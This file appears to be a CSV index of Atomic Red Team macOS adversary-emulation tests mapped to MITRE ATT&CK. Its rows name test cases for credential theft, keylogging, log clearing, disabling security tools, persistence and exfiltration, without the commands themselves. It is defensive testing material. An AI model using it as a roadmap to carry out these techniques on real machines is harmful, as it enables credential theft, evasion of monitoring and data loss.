credential-access,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
credential-access,T1555.001,Credentials from Password Stores: Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
credential-access,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
credential-access,T1040,Network Sniffing,7,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
credential-access,T1040,Network Sniffing,8,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data using stratus,a21118de-b11e-4ebd-b655-42f11142df0c,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,14,Simulating Access to Chrome Login Data - MacOS,124e13e5-d8a1-4378-a6ee-a53cd0c7e369,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,2,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
credential-access,T1110.004,Brute Force: Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
discovery,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
discovery,T1040,Network Sniffing,7,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
discovery,T1040,Network Sniffing,8,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh
discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
discovery,T1082,System Information Discovery,7,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,bash
discovery,T1082,System Information Discovery,11,Environment variables discovery on macos and linux,fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
discovery,T1082,System Information Discovery,12,Show System Integrity Protection status (MacOS),327cc050-9e99-4c8e-99b5-1d15f2fb6b96,sh
discovery,T1217,Browser Bookmark Discovery,2,List Mozilla Firefox Bookmark Database Files on macOS,1ca1f9c7-44bc-46bb-8c85-c50e2e94267b,sh
discovery,T1217,Browser Bookmark Discovery,3,List Google Chrome Bookmark JSON Files on macOS,b789d341-154b-4a42-a071-9111588be9bc,sh
discovery,T1217,Browser Bookmark Discovery,8,List Safari Bookmarks on MacOS,5fc528dd-79de-47f5-8188-25572b7fafe0,sh
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
discovery,T1016,System Network Configuration Discovery,8,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
discovery,T1201,Password Policy Discovery,7,Examine password policy - macOS,4b7fa042-9482-45e1-b348-4b756b2a0742,bash
discovery,T1518.001,Software Discovery: Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
impact,T1531,Account Access Removal,4,Change User Password via passwd,3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6,sh
impact,T1531,Account Access Removal,5,Delete User via dscl utility,4d938c43-2fe8-4d70-a5b3-5bf239aa7846,sh
impact,T1531,Account Access Removal,6,Delete User via sysadminctl utility,d3812c4e-30ee-466a-a0aa-07e355b561d6,sh
impact,T1486,Data Encrypted for Impact,6,Encrypt files using 7z utility - macOS,645f0f5a-ef09-48d8-b9bc-f0e24c642d72,sh
impact,T1486,Data Encrypted for Impact,7,Encrypt files using openssl utility - macOS,1a01f6b8-b1e8-418e-bbe3-78a6f822759e,sh
impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,bash
impact,T1485,Data Destruction,2,macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,bash
impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,bash
impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - macOS/Linux,4963a81e-a3ad-4f02-adda-812343b351de,bash
impact,T1529,System Shutdown/Reboot,5,Restart System via `reboot` - macOS/Linux,47d0b042-a918-40ab-8cf9-150ffe919027,bash
execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1059.002,Command and Scripting Interpreter: AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh
execution,T1569.001,System Services: Launchctl,1,Launchctl,6fb61988-724e-4755-a595-07743749d4e2,bash
execution,T1059.004,Command and Scripting Interpreter: Bash,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
initial-access,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
initial-access,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,Exfiltrate data HTTPS using curl linux,4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 1 chmod - Change file or folder mode (numeric mode) 34ca1464-de9d-40c6-8c77-690adf36a135 bash
3 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 2 chmod - Change file or folder mode (symbolic mode) fc9d6695-d022-4a80-91b1-381f5c35aff3 bash
4 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 3 chmod - Change file or folder mode (numeric mode) recursively ea79f937-4a4d-4348-ace6-9916aec453a4 bash
5 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 4 chmod - Change file or folder mode (symbolic mode) recursively 0451125c-b5f6-488f-993b-5a32b09f7d8f bash
6 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 5 chown - Change file or folder ownership and group d169e71b-85f9-44ec-8343-27093ff3dfc0 bash
7 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 6 chown - Change file or folder ownership and group recursively b78598be-ff39-448f-a463-adbf2a5b7848 bash
8 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 7 chown - Change file or folder mode ownership only 967ba79d-f184-4e0e-8d09-6362b3162e99 bash
9 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 8 chown - Change file or folder ownership recursively 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 bash
10 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 9 chattr - Remove immutable file attribute e7469fe2-ad41-4382-8965-99b94dd3c13f sh
11 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 10 Chmod through c script 973631cf-6680-4ffa-a053-045e1b6b67ab sh
12 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 11 Chown through c script 18592ba1-5f88-4e3c-abc8-ab1c6042e389 sh
13 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
14 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
15 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
16 defense-evasion T1036.005 Masquerading: Match Legitimate Name or Location 1 Execute a process from a directory masquerading as the current parent directory. 812c3ab8-94b0-4698-a9bf-9420af23ce24 sh
17 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 3 Detect Virtualization Environment (MacOS) a960185f-aef6-4547-8350-d1ce16680d09 sh
18 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 1 rm -rf 989cc1b1-3642-4260-a809-54f9dd559683 sh
19 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 2 Delete log files using built-in log utility 653d39cd-bae7-499a-898c-9fb96b8b5cd1 sh
20 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 3 Truncate system log files via truncate utility 6290f8a8-8ee9-4661-b9cf-390031bf6973 sh
21 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 4 Delete log files via cat utility by appending /dev/null or /dev/zero c23bdb88-928d-493e-b46d-df2906a50941 sh
22 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 5 System log file deletion via find utility bc8eeb4a-cc3e-45ec-aa6e-41e973da2558 sh
23 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 6 Overwrite macOS system log via echo utility 0208ea60-98f1-4e8c-8052-930dce8f742c sh
24 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 7 Real-time system log clearance/deletion 848e43b3-4c0a-4e4c-b4c9-d1e8cea9651c sh
25 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 8 Delete system log files via unlink utility 03013b4b-01db-437d-909b-1fdaa5010ee8 sh
26 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 9 Delete system log files using shred utility 86f0e4d5-3ca7-45fb-829d-4eda32b232bb sh
27 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 10 Delete system log files using srm utility b0768a5e-0f32-4e75-ae5b-d036edcf96b6 sh
28 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 11 Delete system log files using OSAScript 810a465f-cd4f-47bc-b43e-d2de3b033ecc sh
29 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 12 Delete system log files using Applescript e62f8694-cbc7-468f-862c-b10cd07e1757 sh
30 defense-evasion T1553.001 Subvert Trust Controls: Gatekeeper Bypass 1 Gatekeeper Bypass fb3d46c6-9480-4803-8d7d-ce676e1f1a9b sh
31 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 1 Clear Bash history (rm) a934276e-2be5-4a36-93fd-98adbb5bd4fc sh
32 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 3 Clear Bash history (cat dev/null) b1251c35-dcd3-4ea1-86da-36d27b54f31f sh
33 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 4 Clear Bash history (ln dev/null) 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 sh
34 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 6 Clear history of a bunch of shells 7e6721df-5f08-4370-9255-f06d8a77af4c sh
35 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 7 Clear and Disable Bash History Logging 784e4011-bd1a-4ecd-a63a-8feb278512e6 sh
36 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 8 Use Space Before Command to Avoid Logging to History 53b03a54-4529-4992-852d-a00b4b7215a6 sh
37 defense-evasion T1140 Deobfuscate/Decode Files or Information 3 Base64 decoding with Python 356dc0e8-684f-4428-bb94-9313998ad608 sh
38 defense-evasion T1140 Deobfuscate/Decode Files or Information 4 Base64 decoding with Perl 6604d964-b9f6-4d4b-8ce8-499829a14d0a sh
39 defense-evasion T1140 Deobfuscate/Decode Files or Information 5 Base64 decoding with shell utilities b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e sh
40 defense-evasion T1140 Deobfuscate/Decode Files or Information 6 Hex decoding with shell utilities 005943f9-8dd5-4349-8b46-0313c0a9f973 sh
41 defense-evasion T1140 Deobfuscate/Decode Files or Information 7 Linux Base64 Encoded Shebang in CLI 3a15c372-67c1-4430-ac8e-ec06d641ce4d sh
42 defense-evasion T1140 Deobfuscate/Decode Files or Information 8 XOR decoding and command execution using Python c3b65cd5-ee51-4e98-b6a3-6cbdec138efc bash
43 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 3 Copy and Delete Mailbox Data on macOS 3824130e-a6e4-4528-8091-3a52eeb540f6 bash
44 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 6 Copy and Modify Mailbox Data on macOS 8a0b1579-5a36-483a-9cde-0236983e1665 bash
45 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 1 Set a file's access timestamp 5f9113d5-ed75-47ed-ba23-ea3573d05810 sh
46 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 2 Set a file's modification timestamp 20ef1523-8758-4898-b5a2-d026cc3d2c52 sh
47 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 3 Set a file's creation timestamp 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b sh
48 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 4 Modify file timestamps using reference file 631ea661-d661-44b0-abdb-7a7f3fc08e50 sh
49 defense-evasion T1027.001 Obfuscated Files or Information: Binary Padding 1 Pad Binary to Change Hash - Linux/macOS dd ffe2346c-abd5-4b45-a713-bf5f1ebd573a sh
50 defense-evasion T1027.001 Obfuscated Files or Information: Binary Padding 2 Pad Binary to Change Hash using truncate command - Linux/macOS e22a9e89-69c7-410f-a473-e6c212cd2292 sh
51 defense-evasion T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 command_prompt
52 defense-evasion T1574.006 Hijack Execution Flow: LD_PRELOAD 3 Dylib Injection via DYLD_INSERT_LIBRARIES 4d66029d-7355-43fd-93a4-b63ba92ea1be bash
53 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
54 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
55 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 3 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
56 defense-evasion T1647 Plist File Modification 1 Plist Modification 394a538e-09bb-4a4a-95d1-b93cf12682a8 manual
57 defense-evasion T1564.002 Hide Artifacts: Hidden Users 1 Create Hidden User using UniqueID < 500 4238a7f0-a980-4fff-98a2-dfc0a363d507 sh
58 defense-evasion T1564.002 Hide Artifacts: Hidden Users 2 Create Hidden User using IsHidden option de87ed7b-52c3-43fd-9554-730f695e7f31 sh
59 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 1 Disable history collection 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 sh
60 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 2 Mac HISTCONTROL 468566d5-83e5-40c1-b338-511e1659628d manual
61 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 5 Disable Carbon Black Response 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c sh
62 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 6 Disable LittleSnitch 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 sh
63 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 7 Disable OpenDNS Umbrella 07f43b33-1e15-4e99-be70-bc094157c849 sh
64 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 8 Disable macOS Gatekeeper 2a821573-fb3f-4e71-92c3-daac7432f053 sh
65 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 9 Stop and unload Crowdstrike Falcon on macOS b3e7510c-2d4c-4249-a33f-591a2bc83eef sh
66 defense-evasion T1027 Obfuscated Files or Information 1 Decode base64 Data into Script f45df6be-2e1e-4136-a384-8f18ab3826fb sh
67 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 3 Install root CA on macOS cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 sh
68 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 3 C compile d0377aa6-850a-42b2-95f0-de558d80be57 bash
69 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 4 CC compile da97bb11-d6d0-4fc1-b445-e443d1346efe bash
70 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 5 Go compile 78bd3fa7-773c-449e-a978-dc1f1500bc52 bash
71 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 1 Delete a single file - Linux/macOS 562d737f-2fc6-4b09-8c2a-7f8ff0828480 sh
72 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 2 Delete an entire folder - Linux/macOS a415f17e-ce8d-4ce2-a8b4-83b674e7017e sh
73 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 3 Binary simply packed by UPX b16ef901-00bb-4dda-b4fc-a04db5067e20 sh
74 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 4 Binary packed by UPX, with modified headers 4d46e16b-5765-4046-9f25-a600d3e65e4d sh
75 defense-evasion T1036.006 Masquerading: Space after Filename 1 Space After Filename (Manual) 89a7dd26-e510-4c9f-9b15-f3bae333360f manual
76 defense-evasion T1036.006 Masquerading: Space after Filename 2 Space After Filename b95ce2eb-a093-4cd8-938d-5258cef656ea bash
77 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 1 Create a hidden file in a hidden directory 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be sh
78 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 2 Mac Hidden file cddb9098-3b47-4e01-9d3b-6f5f323288a9 sh
79 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 5 Hidden files 3b7015f2-3144-4205-b799-b05580621379 sh
80 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 6 Hide a Directory b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 sh
81 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 7 Show all hidden files 9a1ec7da-b892-449f-ad68-67066d04380c sh
82 defense-evasion T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
83 defense-evasion T1078.003 Valid Accounts: Local Accounts 3 Create local account with admin privileges using sysadminctl utility - MacOS 191db57d-091a-47d5-99f3-97fde53de505 bash
84 defense-evasion T1078.003 Valid Accounts: Local Accounts 4 Enable root account using dsenableroot utility - MacOS 20b40ea9-0e17-4155-b8e6-244911a678ac bash
85 defense-evasion T1078.003 Valid Accounts: Local Accounts 5 Add a new/existing user to the admin group using dseditgroup utility - macOS 433842ba-e796-4fd5-a14f-95d3a1970875 bash
86 persistence T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
87 persistence T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
88 persistence T1176 Browser Extensions 1 Chrome (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
89 persistence T1176 Browser Extensions 2 Chrome (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
90 persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
91 persistence T1176 Browser Extensions 4 Edge Chromium Addon - VPN 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 manual
92 persistence T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
93 persistence T1543.004 Create or Modify System Process: Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
94 persistence T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 command_prompt
95 persistence T1546.005 Event Triggered Execution: Trap 1 Trap EXIT a74b2e07-5952-4c03-8b56-56274b076b61 sh
96 persistence T1546.005 Event Triggered Execution: Trap 2 Trap SIGINT a547d1ba-1d7a-4cc5-a9cb-8d65e8809636 sh
97 persistence T1574.006 Hijack Execution Flow: LD_PRELOAD 3 Dylib Injection via DYLD_INSERT_LIBRARIES 4d66029d-7355-43fd-93a4-b63ba92ea1be bash
98 persistence T1136.001 Create Account: Local Account 2 Create a user account on a MacOS system 01993ba5-1da3-4e15-a719-b690d4f0f0b2 bash
99 persistence T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc bash
100 persistence T1547.015 Boot or Logon Autostart Execution: Login Items 2 Add macOS LoginItem using Applescript 716e756a-607b-41f3-8204-b214baf37c1d bash
101 persistence T1546.014 Event Triggered Execution: Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
102 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 2 MacOS - Load Kernel Module via kextload and kmutil f4391089-d3a5-4dd1-ab22-0419527f2672 bash
103 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 3 MacOS - Load Kernel Module via KextManagerLoadKextWithURL() f0007753-beb3-41ea-9948-760785e4c1e5 bash
104 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
105 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
106 persistence T1037.005 Boot or Logon Initialization Scripts: Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
107 persistence T1543.001 Create or Modify System Process: Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
108 persistence T1543.001 Create or Modify System Process: Launch Agent 2 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
109 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
110 persistence T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 1 Copy in loginwindow.plist for Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba sh
111 persistence T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 2 Re-Opened Applications using LoginHook 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
112 persistence T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 3 Append to existing loginwindow for Re-Opened Applications 766b6c3c-9353-4033-8b7e-38b309fa3a93 sh
113 persistence T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
114 persistence T1078.003 Valid Accounts: Local Accounts 3 Create local account with admin privileges using sysadminctl utility - MacOS 191db57d-091a-47d5-99f3-97fde53de505 bash
115 persistence T1078.003 Valid Accounts: Local Accounts 4 Enable root account using dsenableroot utility - MacOS 20b40ea9-0e17-4155-b8e6-244911a678ac bash
116 persistence T1078.003 Valid Accounts: Local Accounts 5 Add a new/existing user to the admin group using dseditgroup utility - macOS 433842ba-e796-4fd5-a14f-95d3a1970875 bash
117 command-and-control T1132.001 Data Encoding: Standard Encoding 1 Base64 Encoded data. 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 sh
118 command-and-control T1090.003 Proxy: Multi-hop Proxy 4 Tor Proxy Usage - MacOS 12631354-fdbc-4164-92be-402527e748da sh
119 command-and-control T1571 Non-Standard Port 2 Testing usage of uncommonly used port 5db21e1d-dd9c-4a50-b885-b1e748912767 sh
120 command-and-control T1071.001 Application Layer Protocol: Web Protocols 3 Malicious User Agents - Nix 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 sh
121 command-and-control T1105 Ingress Tool Transfer 1 rsync remote file copy (push) 0fc6e977-cb12-44f6-b263-2824ba917409 bash
122 command-and-control T1105 Ingress Tool Transfer 2 rsync remote file copy (pull) 3180f7d5-52c0-4493-9ea0-e3431a84773f bash
123 command-and-control T1105 Ingress Tool Transfer 3 scp remote file copy (push) 83a49600-222b-4866-80a0-37736ad29344 bash
